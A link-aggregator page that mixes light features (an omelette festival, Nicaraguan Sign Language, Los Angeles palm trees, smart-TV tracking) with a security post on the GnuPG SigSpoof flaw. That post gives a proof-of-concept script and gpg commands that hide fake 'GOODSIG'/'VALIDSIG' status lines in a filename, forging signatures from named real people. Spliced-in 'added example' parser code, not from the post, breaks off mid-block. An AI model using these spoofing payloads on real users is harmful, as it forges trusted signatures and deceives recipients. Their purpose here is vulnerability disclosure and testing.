security research, software archaeology, geek of all trades

Giant Omelette Festival


Members of the Giant Omelette Brotherhood stir more than 15,000 eggs on March 28, 2016, on the main square of Bessieres, France.

Every Easter, the Brotherhood of the Giant Omelette gathers, as they have for decades, in Bessières, France, to crack more than 15,000 eggs, cook a giant omelette, and distribute portions to thousands of observers who flock to the festivities. 

According to a foundational story, Napoleon Bonaparte, while visiting the area, enjoyed his eggs so much that he asked that a giant omelette be prepared for his troops. So now, each Easter, the cooks don chef's whites and toques. Wielding enormous wooden spoons that look more like oars, they stir the eggs in a massive pan over an open fire in the town square. The multi-day festival invariably includes dancing, music, or parades, but the omelette-making is the main event. 

The organization, which is also known as the Knights of the Giant Omelette, takes their mission seriously: “to prepare and serve, free of charge and full of joy, a giant omelette.” The first event, in the '70s, used a few thousand eggs. It's not only grown in egg count, but leapt borders: Local chapters cook giant omelettes in six other cities, from neighboring Fréjus, France, to Pigüé, Argentina.

zwol
5 days ago
Pittsburgh, PA

How Deaf Children in Nicaragua Created a New Language


Of all the changes within Nicaragua to come out of the overthrow of the Somoza regime by the Sandinistas in 1979, perhaps the least anticipated was the birth of a new language. Nicaraguan Sign Language is the only language spontaneously created, without the influence of other languages, to have been recorded from its birth. And though it came out of a period of civil strife, it was not political actors but deaf children who created the language’s unique vocabulary, grammar, and syntax.

When the Sandinista National Liberation Front gained power, they embarked on what has been described as a “literacy crusade,” developing programs to promote fluency in reading Spanish. One such initiative was opening the first public school for deaf education, the Melania Morales Special Education Center, in Managua’s Barrio San Judas. According to Ann Senghas, a professor of psychology at Barnard College who has studied NSL, it was the first time in the history of the country that deaf children were brought together in large numbers.

These children, who ranged in age from four to 16, had no experience with sign language beyond the “home signs” they used with family members to communicate broad concepts. American Sign Language, which has existed since the early 19th century, is used throughout the Americas and is often considered a “lingua franca” among deaf people whose first sign language is a national or regional one. But the first Nicaraguan deaf school did not use ASL or any signs at all. Instead, they focused on teaching children to speak and lip-read Spanish.


This educational strategy, known as “oralism,” has long been a subject of debate in deaf education, one that was particularly fierce in the United States where ASL originated. Around the turn of the 20th century, some deaf-education advocates believed that the ability to speak and lip-read a language would be more beneficial to deaf individuals than “manualism,” communication via sign language. By learning English, they argued, deaf individuals would be able to fully participate in U.S. society.

English immersion for the deaf was part of a wider effort, epitomized by the eugenics movement, to stamp out differences within the American population. Among the most vocal proponents of eugenics when it came to the deaf community was the inventor of the telephone, Alexander Graham Bell. Bell argued that if deaf people were allowed to communicate via sign language, their isolation from the hearing population would lead to more deaf marriages and, consequently, a larger deaf population.

“Oralism, Bell believed, allowed deaf people to leave their educational and cultural corners and participate in society at large,” writes Brian H. Greenwald, professor of history at the deaf institution Gallaudet University, via email. Bell, Greenwald notes, “used oralism as a form of assimilation.” It was a strategy that Bell hoped would eventually lead to the eradication of deafness in American society.

In Managua in the 1980s, too, though free of the influence of eugenicists, the Sandinistas’ focus on Spanish literacy resulted in the immersion of deaf students in Spanish speaking and reading skills. But while the country’s deaf children were being taught Spanish inside the classroom, outside the classroom they were spontaneously developing their own method of signed communication.

Though older and younger students attended separate classes during school hours, on buses and playgrounds the children quickly began to select “conventions” for necessary words. Such conventions occur when a community of speakers, who at home may have all used different signs to refer to an object or action, begin to consistently default to using just one, says James Shepard-Kegl. Kegl is co-director of the Nicaraguan Sign Language Project, which administers programs to empower the Nicaraguan deaf community through the use of sign language. “You start building a vocabulary this way,” he says.


All languages have grammar and syntax, but the first children at Managua’s deaf school had no model for how a language worked because they had been isolated from signed, spoken, and written language all their lives, Shepard-Kegl notes. When the children interacted, instead of adapting their signs to fit an existing language, they developed something unique. While the older students had more life experience, it was actually the younger kids that drove the language’s development. “As you get older, your language instincts tend to diminish,” says Shepard-Kegl. “A lot of those older kids weren’t generating grammar the way little kids did. They copied the grammar the little kids generated.”

No one knows exactly how many individuals are needed to generate a new language or what percentage of those individuals need to be young children. Smaller-scale isolated deaf-education programs had existed previously in 20th-century Nicaragua, Shepard-Kegl says, but the critical mass needed to spontaneously develop Nicaraguan Sign Language only occurred with the opening of Melania Morales. Within a few years, teachers and education officials recognized that something incredible was happening at the school and, in 1986, Nicaragua’s Ministry of Education invited the U.S. linguist Judy Kegl to visit as a deaf-education consultant.


For Kegl and the other linguists that accompanied her after the initial visit, the opportunity to identify and study Nicaraguan Sign Language was “extremely rare,” writes Senghas in her 1995 MIT doctoral dissertation, Children’s Contribution to the Birth of Nicaraguan Sign Language, which focuses on the years she spent working with Kegl. (Kegl is today co-director of the Nicaraguan Sign Language Project and married to Shepard-Kegl.) It’s an opportunity that owes much to the birth of NSL occurring in the 1980s, when researchers had access to video cameras and could accurately record exactly what was happening. “To my knowledge,” Senghas writes, “there has not been another case of linguists and psycholinguists documenting the birth of a language on a community-wide scale.”

This is not to say, however, that other independent community-based sign languages never existed. In fact, the linguistic world is rich with a wide variety of mutually unintelligible signed languages. Though American Sign Language and some other widely utilized sign languages, such as Chinese Sign Language and Indo-Pakistani Sign Language, have long histories, they were often inaccessible to deaf families and institutions in rural, mountainous, or politically-charged regions. In order to communicate manually, these communities had to develop their own signed languages. For example, in early-to-mid-20th century Jim Crow-era Raleigh, North Carolina, under-resourced and pedagogically isolated African-American deaf schools independently developed unique languages, says Susan Burch, an American Studies professor at Middlebury College. It’s something that has occurred many times in history.

Nicaraguan Sign Language similarly developed in a vacuum. Whereas American Sign Language could have extended into Nicaragua by the 1980s, as it did in neighboring Costa Rica where it combined with a locally developed sign language in the 1960s, Nicaragua’s geo-political isolation prevented ASL from entering the country, notes Shepard-Kegl. Not only did this allow for the independent creation of Nicaraguan Sign Language, but it helped the nascent form of communication to survive.


Around the world, deaf sign languages, including the one spoken among African Americans in Raleigh, have disappeared or changed significantly when a more widely used language has entered the region. Linguists refer to this displacement as “linguistic imperialism.”

It is a concept that has generated considerable controversy. Some linguists feel that the “contamination” of a local language by a more globally dominant one results in the marginalization of a native community because it supplants the indigenous form of communication with something from outside. Others believe that when dominant languages arrive, they are appropriated by indigenous communities, often combining with an existing language to create a distinctly local version. Deaf Costa Ricans born prior to the 1960s, for example, primarily use what is referred to as Old Costa Rican Sign Language. When ASL arrived in the country after the 1960s, its appropriation by the deaf community resulted in the creation of New Costa Rican Sign Language (sometimes called Modern Costa Rican Sign Language), around 60 percent of which is made up of ASL signs.

In Nicaragua today, changes in technology and communication have led to the increased use of American Sign Language within the deaf community. While ASL has not replaced the pristine, isolated NSL of the 1980s, which still dominates deaf education there, Nicaraguan Sign Language has begun a natural process of integrating elements of ASL. “Languages, by nature, borrow,” says Shepard-Kegl. “They either borrow or they perish.”

For all that linguists have learned from the study of Nicaraguan Sign Language, perhaps most important is the proof it has provided for a controversial theory of language. In the 1960s, Noam Chomsky suggested that children are born with an innate ability to learn human language. Babies are not given grammar lessons and yet they reliably learn grammar because they have inherent expectations about how languages function, says Shepard-Kegl. Kids “don’t know what the [grammatical] rule is but [they] expect that there is a rule.” In Managua’s first deaf school, there was no model and no one to guide the children in sign language and still a language was created in a way never observed before.

zwol
37 days ago
Pittsburgh, PA

Why Are There Palm Trees in Los Angeles?


Let’s go back in time, to Los Angeles in 1875. Here’s what you see: basically nothing. The town—and “town” is even sort of grand for what it was—has about 8,000 people in it. But here’s something weirder: there are no palm trees. As a matter of fact, there aren’t really any trees at all. This area is just sort of a scrubland desert.

Over the next 50 years, palm trees would become a major transformative force in the development of Los Angeles. This is despite the fact that they don’t really do anything. The trees of urban Los Angeles do not provide shade or fruit or wood. They are lousy at preventing erosion. What they do, and what they did, is stranger: they became symbols.


There is a single species of palm native to the entire state of California, the California fan palm, which is a big one with what looks like a fuzzy beard of brown leaves underneath its green fronds. It’s naturally found around desert oases in the Colorado Desert. (The Colorado Desert is not in Colorado, but is named for the river. Joshua Tree National Park is there.) The native people of that area, the Cahuilla, used it pretty liberally; palm fronds are incredibly strong and heavy, which makes them good for building. But compared with the East Coast palms—there are 12 species native to Florida—the West Coast was, until very recently, basically barren of these trees. Plants. Tall grass things. Wait, what are palms, exactly?

One first weird thing in a very long list of weird things about palms is that they are not really trees. The word “tree” is not a horticultural term—it’s sort of like “vegetable,” in that you can kind of call anything a vegetable—but palms are not at all like the other plants commonly referred to as trees. They don’t have wood, for one thing; the interior of a palm is made up of basically thousands of fibrous straws, which gives them the tensile strength to bend with hard tropical windstorms without snapping. They are monocots, which is a category of plant in which the seed contains only one embryonic leaf; as monocots, they have more in common with grasses like corn and bamboo than they do with an oak or pine tree.

Southern California might not have been rich with trees, but it was rich with money and rich with sunshine. Once the railroads came to Los Angeles, in the 1880s, speculators realized this huge empty sunny place would be a great opportunity to sell land. But how to get people to move way out to the desert? One way was incredibly cheap train tickets; the railroads sold tickets from the Midwest for as little as one dollar. But, as with California ever since, the place had to be marketed.


There are only two palm species native to Europe; one is a little shrub, and the other is restricted to a few Mediterranean islands. Because they were not common, palms have for centuries had a strange pull for people who didn’t grow up around them. “In the Western imagination, palms for a very very long time were associated with that part of the world that, depending on your point of view and your time in history could be called the Orient, or the Far East, or the Middle East, or the Levant, or the Holy Land, or the Ottoman world, or the Turkish world,” says Jared Farmer, the author of the definitive book on California foliage, Trees in Paradise.

Palms grow freely in the Middle East, and this part of the world always had major religious associations for Westerners, most of whom, for a long time, followed Christianity, Judaism, or Islam—all of which have their holiest sites there. Palms themselves are used in those religions: Jews use them during Sukkot for waving rituals, and Christians use them on Palm Sunday, often folded into crosses. The Prophet Mohammed talks about date palms a lot, even if the plant doesn’t have as prominent a role in the rituals of Islam.

The original reason that palms were planted in the New World was for use during Palm Sunday; Catholic missionaries in Florida and California, finding themselves in a place with a hospitable climate for palms, planted them around their missions. But the missionaries are not responsible for the mass of palms in Los Angeles.


Up until the mid- to late-19th century, the French Riviera was sparsely populated. But popular writers began traveling there, and found it was pretty nice. That, coupled with a trendy new health fad in which time in a dry warm climate is supposed to have good effects on the body, increased its popularity. Immediately developers moved there and began building it up. Palms, already a symbol of warmth from the Middle East, were ideal for this kind of rapid development.

Remember how palms aren’t like other trees? One way is that they’re outrageously easy to move around: they don’t have elaborate root systems like oak trees, but instead a dense yet small root ball. This can be pretty easily dug up and transported, then planted, and palms are not particular about where they are, as long as they have sun and water. To make things easier for developers, palms, being more like grasses than trees, don’t demonstrate all that much difference between individuals; one Mexican fan palm is pretty much like the next. And if you’re a developer, consistency and ease of transportation is a fantastic combination: you can line the streets with them, or plant one on each side of an entrance! And it’s cheap and easy and looks festive. Plus, it has this preexisting association in the minds of your customers (who, in the case of the early French Riviera, were mostly British) with warmth and exoticism.

Palms, though they weren’t native to the Riviera, became indelibly associated with it. And the American developers eyeing Southern California got some ideas. Hey, they thought. This big chunk of desert-y scrubland we own is not that dissimilar from the Mediterranean sites of the Riviera. What if we took a page from their book, and started branding Los Angeles?


Los Angeles, for what it’s worth, wasn’t the only place to try copying the French Riviera. The British tried it too, in a place called Torbay, although even in the far south of England it’s just not warm enough for palms to really thrive. They did their best, though, with a palm called the New Zealand cabbage palm, planted all over the area. It’s basically a shrub.

Anyway, palms took off as a symbol of wealth, luxury, nice weather, vacation. The ease of growing them in containers meant that palms were found on luxury ships like the Titanic and Lusitania. Robber barons, fancy hotels, and magnates in San Francisco—a much older city than Los Angeles—planted them in “palm courts,” a sort of atrium/ballroom featuring lots of palms and probably a string quartet.

“What LA adds to that, which no city, no people had ever thought to do before, and maybe for good reason, is to plant palms systematically as street trees,” says Farmer. The young city, wanting to attract people to a world of sunshine and cars, planted tens of thousands of palm trees. And they weren’t just on big boulevards: Los Angeles planted them everywhere. Tiny residential streets, parks, anywhere. Places designed for tourists—boardwalks, beaches, wealthy hills, even sports arenas like Staples Center, where the Lakers and Clippers basketball teams play—were especially tended to. And they made sure the palms were watered.


Palm trees weren’t the only non-natives that the early planners of Los Angeles planted. They also planted lots of citrus trees, pepper trees, and eucalyptus, all of which were supposed to evoke this Mediterranean feel. But it was the palms that really took off.

This experiment yielded some very strange results. The palms thrived in Los Angeles—Farmer described seeing them growing in cracks in the asphalt in abandoned lots—and one species in particular, the Mexican fan palm, grew enormous. The Mexican fan palm is native to Northern Mexico; it’s that incredibly tall skinny one with the little fronds high up above. “Nobody knew they would grow so tall; they grow taller in LA than they would in the wild. They're the tallest palms in the history of the world, at least that we know of,” says Farmer.

They are, in fact, taller than most buildings in Los Angeles. The city has always been a sprawling, low-slung city, with few buildings over two stories tall. It spread horizontally rather than vertically, partially due to the cheap abundant land and partially because Los Angeles was always an automotive city. Unlike in other cities, the great skyscrapers of Los Angeles are not huge buildings: they’re trees.


Once the palms were firmly ensconced in Los Angeles, the movie and TV industry popularized them. The palms, despite not being native to LA and in fact only having recently arrived there, became the most iconic image of the city. Every awards show, every red carpet, every movie and show shot in Southern California included palm trees. The city expanded like crazy; the population went from 11,000 in 1880 to over 1.2 million only 50 years later.

Urban trees do actually have jobs, besides just looking nice: they provide shade, reduce heat, clean the air, some prevent erosion, and some produce an edible or useful material. Palms in Los Angeles do not do any of this. Their job was not to be good urban trees; it was to create an image of a new kind of city and convince people from elsewhere to come to Los Angeles. They succeeded at that! But with the first batch of trees now dying out due to old age and an array of pests and diseases, Los Angeles is making some changes. Replacement palms are more likely to be more drought-tolerant and provide more shade, like the Chilean palm. But, says Farmer, Los Angeles is not likely to ever let palms completely vanish.

zwol
43 days ago
Pittsburgh, PA

Smart TVs in Millions of U.S. Homes Track Everything Users Watch


Sapna Maheshwari, New York Times:

Still, David Kitchen, a software engineer in London, said he was startled to learn how Samba TV worked after encountering its opt-in screen during a software update on his Sony Bravia set.

The opt-in read: “Interact with your favorite shows. Get recommendations based on the content you love. Connect your devices for exclusive content and special offers. By cleverly recognizing onscreen content, Samba Interactive TV lets you engage with your TV in a whole new way.”

[…]

“The thing that really struck me was this seems like quite an enormous ask for what seems like a silly, trivial feature,” Mr. Kitchen said. “You appear to opt into a discovery-recommendation service, but what you’re really opting into is pervasive monitoring on your TV.”

[…]

Jeffrey Chester, executive director of the Center for Digital Democracy, said few people review the fine print in their zeal to set up new televisions. He said the notice should also describe Samba TV’s “device map,” which matches TV content to mobile gadgets, according to a document on its website, and can help the company track users “in their office, in line at the food truck and on the road as they travel.”

Do people truly want to be tracked for advertising purposes by nearly every device that they interact with? Survey after survey for years has indicated that they do not, yet we seem to have shrinking opportunities to object to it. Nearly every TV you’ll find at an electronics store today is a smart TV, and many of them have some form of this kind of tracking built in. The number of ways we’re being tracked on the web has exploded, and the number of companies that trade and collect that information in bulk keeps going up.

This is all buried in multi-thousand-word privacy policies that are not reasonable for the average user to read and interpret correctly. This is one reason I’m so supportive of GDPR — even though it doesn’t adequately regulate behavioural data collection, it does at least require full disclosure of privacy-intrusive practices to allow users more control over the sharing of their data.

Technology companies are increasingly not operating in users’ best interests because users have few options besides disconnecting entirely.

Maheshwari, continued:

The Times is among the websites that allow advertisers to use data from Samba to track if people who see their ads visit their websites, but a Times spokeswoman, Eileen Murphy, said that the company did that “simply as a matter of convenience for our clients” and that it was not an endorsement of Samba TV’s technology.

As I wrote in April, website administrators have a responsibility to their users — and, in the Times’ case especially, their paying subscribers — to be careful with their website’s third-party data collection and sharing practices. Their agreement with Samba is an implicit endorsement that advertisers can target their users with data collected in an ethically-dubious manner.

zwol
43 days ago
I’m really not looking forward to the inevitable day when I have to replace my nice reliable dumb TV, purchased 2008. It only ever gets used as a computer monitor so maybe I can just buy a computer monitor.
Pittsburgh, PA
MotherHydra
43 days ago
I hope monitors get big enough. I still haven't seen black levels on par with Panasonic's plasma sets.
acdha
43 days ago
Washington, DC

Pretty Bad {Protocol,People}


tl;dr: This vulnerability affects GnuPG and several plugins and wrapper libraries, including Vinay Sajip’s “python-gnupg” which I rewrote many years ago after finding a shell injection vulnerability in his code. His code is vulnerable to SigSpoof; mine isn’t.

Markus Brinkmann, a NeoPG developer, wrote about a recent signature spoofing vulnerability in GnuPG which carried over into several downstream plugins and wrapper libraries—largely due to GnuPG’s interface design, which uses file descriptors, and only file descriptors, to speak a custom, potentially binary but often ASCII, order-dependent line protocol whose line order, keywords, number of fields, and other details are subject to change between minor point versions of GnuPG. If that sounds like a special hell invented by some sort of unholy crossing between RMS and a rabid howler monkey: welcome to working with (or rather, more likely, around) the Terrible Idea Generator known as the GnuPG development team.

As previously mentioned, while working with Riseup¹ folks on a project, we found a shell injection vulnerability in Vinay Sajip’s python-gnupg module (the one that installs if you do pip install python-gnupg; mine installs with pip install gnupg). The fix was not merely to remove the shell=True argument passed to a call to subprocess.Popen(), as Vinay believed (and continues to believe), but instead to sanitise all inputs and whitelist the available options. There are hundreds of flags to the gnupg binary. Some flags and options are safe. Others can be, if you carefully sanitise their arguments. Others must be disallowed entirely.

My python-gnupg module isn’t vulnerable to SigSpoof, for several reasons:

  1. --no-options is passed by default. So if you’ve got something stupid in your gpg.conf file, you’ll still be fine while using my Python module.

  2. --verbose is not passed. This means that my library doesn’t have to wade through a mixture of strange stderr and GnuPG status-fd messages on the same file descriptor. You could pass --verbose to it manually, as it is in the list of allowable, whitelisted options, but the exploit still won’t work, which brings us to our next point:

  3. All inputs to, and outputs from, the gnupg binary are sanitised and then forced to conform to whitelists. This means that, even if you did pass --verbose manually, the filename trick won’t work because there’s no way to safely sanitise a filename, because filenames may be arbitrary bytes.
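As an added illustration (not code from this post, nor from either python-gnupg), here is a naive status-fd reader beside a strict one, run over constructed text shaped like the mixed stderr/status stream the injected filename produces. The key id, fingerprint and user id are made up, and the strict reader assumes gpg was invoked with --no-options, without --verbose, and with --status-fd on a descriptor that is not shared with stderr.

```python
"""Naive vs. strict readers for GnuPG's status-fd line protocol (added
example, not code from the post).  All samples below are constructed."""
import re
from collections import namedtuple

VerifyResult = namedtuple("VerifyResult", "valid fingerprint reason")

STATUS_PREFIX = "[GNUPG:] "
HEX16 = re.compile(r"^[0-9A-F]{16}$")
HEX40 = re.compile(r"^[0-9A-F]{40}$")   # v4 key fingerprint (assumed)
DATE = re.compile(r"^\d{4}-\d{2}-\d{2}$")

# Status keywords this reader is willing to interpret; anything else aborts.
ALLOWED_KEYWORDS = frozenset([
    "NEWSIG", "GOODSIG", "BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG",
    "VALIDSIG", "SIG_ID", "NO_PUBKEY", "KEY_CONSIDERED", "TRUST_UNDEFINED",
    "TRUST_NEVER", "TRUST_MARGINAL", "TRUST_FULLY", "TRUST_ULTIMATE", "ENC_TO",
    "BEGIN_DECRYPTION", "END_DECRYPTION", "DECRYPTION_OKAY", "DECRYPTION_FAILED",
    "PLAINTEXT", "PLAINTEXT_LENGTH"])

# Made-up key material for the samples (no real key has these values).
SIGNER_FPR = "00001111222233334444555589ABCDEF01234567"
SIGNER_KEYID = SIGNER_FPR[-16:]
UID = "Example User <user@example.org>"

GOODSIG_LINE = "[GNUPG:] GOODSIG %s %s" % (SIGNER_KEYID, UID)
VALIDSIG_LINE = ("[GNUPG:] VALIDSIG %s 2018-05-31 1527721037 0 4 0 1 10 01 %s"
                 % (SIGNER_FPR, SIGNER_FPR))

# What a wrapper sees with `--verbose --status-fd 2`: stderr and status lines
# on ONE descriptor.  The attacker-chosen literal-packet filename, printed by
# --verbose between the quotes, carries newlines and fake status lines.
MIXED_STDERR_AND_STATUS = "\n".join([
    "gpg: encrypted with 4096-bit RSA key, ID 0123456789ABCDEF",
    "[GNUPG:] ENC_TO 0123456789ABCDEF 1 0",
    "[GNUPG:] BEGIN_DECRYPTION",
    "gpg: original file name='",
    GOODSIG_LINE,
    VALIDSIG_LINE,
    "[GNUPG:] TRUST_FULLY 0 classic",
    "gpg: '",
    "[GNUPG:] DECRYPTION_OKAY",
    "[GNUPG:] END_DECRYPTION",
]) + "\n"

# A genuinely signed message as read from a DEDICATED status fd.
GENUINE_SIG_STATUS = "\n".join([
    "[GNUPG:] NEWSIG",
    GOODSIG_LINE,
    VALIDSIG_LINE,
    "[GNUPG:] TRUST_FULLY 0 classic",
])

# Injected lines shaped like the post's PoC #2: a 16-hex "fingerprint" and a
# date of "x" in VALIDSIG, which a strict field check refuses.
MALFORMED_SIG_STATUS = "\n".join([
    GOODSIG_LINE,
    "[GNUPG:] VALIDSIG %s x 1527721037 0 4 0 1 10 01" % SIGNER_KEYID,
    "[GNUPG:] TRUST_FULLY",
])


def naive_verify(stream):
    """A vulnerable reader: trusts any line carrying the prefix, wherever it
    came from, and treats GOODSIG alone as proof of a valid signature."""
    for line in stream.splitlines():
        if line.startswith(STATUS_PREFIX):
            if line[len(STATUS_PREFIX):].split(" ", 1)[0] == "GOODSIG":
                return True
    return False


def strict_verify(status_text, trusted_fingerprints):
    """Reader for a dedicated status fd: rejects anything that is not a
    well-formed, whitelisted status line and pins the signer's fingerprint."""
    goodsig_keyid = validsig_fpr = None
    for line in status_text.splitlines():
        if not line.startswith(STATUS_PREFIX):
            # A dedicated status fd carries only status lines; anything else
            # means stderr got mixed in, the condition SigSpoof relies on.
            return VerifyResult(False, None, "non-status data on status fd")
        fields = line[len(STATUS_PREFIX):].split(" ")
        keyword, args = fields[0], fields[1:]
        if keyword not in ALLOWED_KEYWORDS:
            return VerifyResult(False, None, "unexpected keyword " + keyword)
        if keyword == "GOODSIG":
            if len(args) < 2 or not HEX16.match(args[0]):
                return VerifyResult(False, None, "malformed GOODSIG")
            goodsig_keyid = args[0]
        elif keyword == "VALIDSIG":
            if (len(args) not in (9, 10) or not HEX40.match(args[0])
                    or not DATE.match(args[1]) or not args[2].isdigit()):
                return VerifyResult(False, None, "malformed VALIDSIG")
            validsig_fpr = args[0]
    if goodsig_keyid is None or validsig_fpr is None:
        return VerifyResult(False, None, "no complete signature status")
    if not validsig_fpr.endswith(goodsig_keyid):
        return VerifyResult(False, validsig_fpr, "GOODSIG/VALIDSIG key mismatch")
    if validsig_fpr not in trusted_fingerprints:
        return VerifyResult(False, validsig_fpr, "signer not pinned")
    return VerifyResult(True, validsig_fpr, "ok")
```

On the mixed stream the naive reader reports a valid signature while the strict reader stops at the first non-status line; on the genuine sample only the strict reader's answer carries a pinned fingerprint.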

Amusingly, the front page of Vinay’s current documentation states:


Which beautifully demonstrates that Vinay still doesn’t understand the original bug report. Additionally, not a single line of his original code remains unchanged, as the bulk of it was badly written and contained hidden landmines.

At the time I pointed out the vulnerability, Vinay argued that it wasn’t a bug until a working exploit for a Bitcoin exchange C&C server, which was unfortunately running his code, was released. Vinay released several versions of his library at the time, without making the version controlled repo available, meaning that for each new version he claimed to have “fixed the bug”, I had to diff the tarballs to discover, unsurprisingly, that he had, in fact, not.

I find it difficult to convey how thoroughly unimpressed I am with men like Vinay. I volunteered the work, handed him an explanation and a solution, and was ridiculed, told I was wrong, that I didn’t understand, and ignored. He’s still never credited me by name anywhere for finding the original bug. Men like this make me want to go write closed source code that none of you will ever see, just so that I never have to deal with these GNU/Beardos ever again. Have fun with the bugs, Vinay, they’ll certainly keep coming.

Test it yourself

Here is a script which will print the status-fd output of GnuPG and test a spoofed signature (PoC #1), a spoofed signature plus a falsely encrypted (i.e. appears to have been encrypted to the user, when in fact no encryption was used) message (PoC #2), and an additional method for signature spoofing (PoC #3):

    #!/usr/bin/env python
    #
    # Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
    # is vulnerable to SigSpoof.
    #
    # Authors: isis agora lovecruft 

    from __future__ import print_function

    import gnupg

    # Set the gnupg log level to `--debug-level=guru` (lmao).
    log = gnupg._logger.create_logger(9)
    log.setLevel(9)

    # Create our gpg instance
    gpg = gnupg.GPG(binary="/usr/bin/gpg2")

    poc1msg = '''\
    -----BEGIN PGP MESSAGE-----

    hQIMAwxKj89n7yVcARAAkhbztv+rjtUZx4rSqpvlj8a9g+y+8ZOY8JhBFvJzVAXe
    tnBNDGmIAc9I9ewRgxwsgcCIlUuGYCSgFugWLYVPD+e0tyQwx76mpMZc5wqAMows
    mk2pavdYMD2FGePY9mCVDvpC8ldumVn2dgT0k2IIOVr8w29CRgzP8ONwAyFFr4Gw
    hZ82e+CLKMFOv7Aigp00D1esurNTzFN5MDJZqhQtPpXawexUjrl5GEsPtKLDkKyt
    iOR5HauLLlDPZJXhHqwrqbSKTpKJU9lztmFp3XVom6VgeCiHWcL0mYF2fcbzfJS/
    CjDFZqFmFPGUJSpdgDcGEGsalzk6o8RFtUvvmKtQLN9BglpYkyPXQiO8vCyS4xiN
    D0gjBxVSvvkdS7734FYxePkUDEOTQbPuJ+FzgMN6Jpp8hVopYbefVcU5bNIY4H2P
    9EAHgvX1AT+VtPPt0JxzQ5/UdXK5KE7O7zUtTJIkXd4hGFpWyZp8hTUEgqLHfHUw
    Qlso2hQ+xgqok1ruGRjYk7n48Uw89jYpBXCOJerZeQGrmGWEkuf1vonFVwddM/4p
    msPN9I6Ahf+Uth+U5rFO4Y2G5fk83saa6ZfM9qdZKgLLEOgXmyycAdSAq/vRRe1G
    z9W77qcuIdhi2dA6+CJBqkm97aYNvoQ4Mxt97e7nP5WijXwugumdMQ7oT1upIsbS
    wFQBov2rvuwWsqrw+kbPD+zedi0NP31BohjiEhBamohGkkh8gr4hPmiyJdm0TIfh
    GBo5z35kRQiJZ9DwmgxE+LnVWQvChEJt0NFuC5FqM5bBaOjR5b2QsYn5uZ5AnVTa
    OZj5HBaaZQqZod5FrGpVpmXG2+RThge8dCbx+CDdBWvLq99TppzcN5nGEHYaz41X
    1ZKRcpbUuixBn3juC6HN2iQq9BidAbpVWvTAYD4dH+/aio3fd+3wSCgHQnPRzxg9
    5YaF6XbFYO8ceruOmnzYYEQTBRmlrBbnaug/cDa5Yq4HIWDHRTR9/aK4Y9rcYsoK
    Jm+7ujLey3TsI9qMs3cbcmsZbnXm+v3uDLvGBofG/dAjqVvm074=
    =UN+a
    -----END PGP MESSAGE-----
    '''

    result1 = gpg.verify(poc1msg)
    print("[poc1] Was the spoofed signature valid? %r" % result1.valid)

    poc2msg = '''\
    -----BEGIN PGP MESSAGE-----

    y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
    IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
    RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
    CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
    W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
    QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
    b3QgdG9tb3Jyb3cgMTBhbS4K
    =Qs3t
    -----END PGP MESSAGE-----
    '''

    result2 = gpg.decrypt(poc2msg)
    print("[poc2] Was the spoofed signature and encryption valid? %r"
          % result2.valid)

    poc3msg = '''\
    -----BEGIN PGP MESSAGE-----

    owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
    79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
    KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
    O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
    mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
    =zQV0
    -----END PGP MESSAGE-----
    '''

    result3 = gpg.verify(poc3msg)
    print("[poc3] Was the spoofed signature valid? %r" % result3.valid)

The GnuPG blobs were generated with (via Markus Brinkmann’s suggestions):

## PoC #1
echo 'Please send me one of those expensive washing machines.' | \
gpg --armor -r a3adb67a2cdb8b35 --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

## PoC #2
echo "See you at the secret spot tomorrow 10am." | \
gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

## PoC #3
echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]
'\''msg'`" > poc3.msg

Again, not vulnerable, for all the reasons described above.
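The three shell commands above all rely on the same trick: a literal-packet filename containing newlines, so that when gpg echoes that filename on its log output the echoed text looks like status lines. The following is an added example, not code from the original post or from either python-gnupg library, contrasting the parsing pattern that trick defeats (grepping a mixed log/status stream for GOODSIG) with a stricter one that reads only a dedicated status descriptor, whitelists keywords, validates the GOODSIG and VALIDSIG fields, and fails closed on anything that is not a status line. Every stream below is constructed for illustration; the key ids and fingerprints are placeholders, not real keys.

```python
# Added example, not code from the original post or from either python-gnupg
# library. All stream contents are constructed; key ids and fingerprints are
# placeholders, not real key material.
import re

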